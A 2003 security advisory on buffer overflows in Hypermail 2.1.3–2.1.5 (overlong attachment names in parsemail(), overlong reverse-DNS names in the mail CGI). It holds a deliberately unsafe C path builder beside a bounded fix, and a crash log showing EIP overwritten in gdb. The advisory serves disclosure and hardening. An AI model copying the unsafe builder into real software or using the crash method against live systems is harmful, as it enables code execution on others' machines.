Security Lab

Multiple buffer overflows in Hypermail

Publication date: 29.01.2003
Total views: 1270
Severity:
Fix available:
Number of vulnerabilities: 1
CVE ID: No data
Exploitation vector:
Impact:
CWE ID: No data
Exploit available: No data
Vulnerable products:
Description: Several buffer overflows have been found in the Hypermail web mail system. A remote attacker can execute arbitrary code on the vulnerable system.

Reportedly, a remote attacker can send a specially crafted e-mail message with an overly long attachment name (252 characters) to a user of a Hypermail system, which triggers a buffer overflow. The overflow occurs only in certain Hypermail configurations (the progress parameter set to 2). The overflow is in the parsemail() function in the 'parse.c' file and allows a remote user to execute arbitrary code on the system with the privileges of the Hypermail process.

According to the report, several further buffer overflows were found in the parsemail() function that cannot be exploited to execute arbitrary code. A buffer overflow was also found in the 'mail' CGI component of Hypermail. The overflow occurs during a reverse DNS lookup if the returned host name is longer than 122 characters. A remote attacker who controls a DNS server or is able to spoof a DNS response can supply a specially crafted host name that causes the mail CGI script to execute arbitrary code. Finally, the mail CGI program allows a remote user to send e-mail to arbitrary recipients.

The vulnerability was found in Hypermail 2.1.3, 2.1.4 and 2.1.5.
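Both overflows described above share one bug class: attacker-controlled text (an attachment file name, a reverse-DNS host name) copied into a fixed-size buffer without a length check. The C below is an added illustration, not Hypermail's code: a hypothetical unsafe path builder beside a bounded one that refuses truncated results, plus a host-name validator using the 122-character figure from the advisory as its cap; the buffer sizes and the check_* drivers are constructed for the demonstration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define HOST_MAX_LEN 122  /* cap taken from the advisory's reverse-DNS figure */

/* Bug-class illustration (hypothetical, not Hypermail's own code): an
 * attacker-controlled attachment name formatted into a fixed buffer with no
 * length check, so a 252-byte name overruns any smaller destination. */
void unsafe_build_path(char *out, const char *dir, int index, const char *name)
{
    sprintf(out, "%s/%02d-%s", dir, index, name);  /* strlen(name) unbounded */
}
/* Hardened form: bounded formatting, and a truncated result is an error
 * rather than a silently altered path. Returns 0 on success, -1 otherwise. */
int safe_build_path(char *out, size_t outsz, const char *dir, int index, const char *name)
{
    int n = snprintf(out, outsz, "%s/%02d-%s", dir, index, name);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}
/* A reverse-DNS answer is attacker-influenced input as well: enforce a length
 * cap and a conservative character set before the name reaches any buffer. */
int hostname_ok(const char *host, size_t max_len)
{
    size_t len = strlen(host);
    if (len == 0 || len > max_len) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '-' && c != '.') return 0;
    }
    return 1;
}
/* Constructed drivers: a name of name_len 'U's (like the advisory's crash log)
 * into a bufsz-byte path buffer, and a host name of host_len letters. */
int check_name(size_t name_len, size_t bufsz)
{
    char name[512], path[512];
    if (name_len >= sizeof name || bufsz > sizeof path) return -2;
    memset(name, 'U', name_len); name[name_len] = '\0';
    return safe_build_path(path, bufsz, "vsu//att-0000", 1, name);
}
int check_host(size_t host_len)
{
    char host[512];
    if (host_len >= sizeof host) return -2;
    memset(host, 'a', host_len); host[host_len] = '\0';
    return hostname_ok(host, HOST_MAX_LEN);
}
```

A 252-character name is rejected by the bounded builder when the destination is too small (the unsafe builder would have written past it), and a host name one byte over the cap is rejected before it is used.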

Example:

$ cat /etc/redhat-release
Red Hat Linux release 7.3 (Valhalla)
$ uname -a
Linux h130n1flsxxoxxx.telia.com 2.4.18-19.7.x #1 Thu Dec 12 09:00:42
EST 2002 i686 unknown
$ pwd
/home/vsu/secwork/hypermail-2.1.5/src
$ ./hypermail -o progress=2 -m /var/spool/mail/vsu
 Creating directory "vsu", mode 755.
Loading mailbox "/var/spool/mail/vsu"...
 Creating directory "vsu//att-0000", mode 755.
   0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUU
Segmentation fault
$ rm -rf vsu
$ gdb hypermail
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r -o progress=2 -m /var/spool/mail/vsu
Starting program: /home/vsu/secwork/hypermail-2.1.5/src/hypermail -o
progress=2 -m /var/spool/mail/vsu
 Creating directory "vsu", mode 755.
Loading mailbox "/var/spool/mail/vsu"...
 Creating directory "vsu//att-0000", mode 755.
   0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUU

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) whe
#0  0x55555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax            0x0      0
ecx            0x0      0
edx            0x0      0
ebx            0x55555555       1431655765
esp            0xbfffe870       0xbfffe870
ebp            0x55555555       0x55555555
esi            0x55555555       1431655765
edi            0x55555555       1431655765
eip            0x55555555       0x55555555
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
xmm0           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm1           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm2           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm3           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm4           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm5           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm6           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm7           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb) q
The program is running.  Exit anyway? (y or n) y

References: Hypermail buffer overflows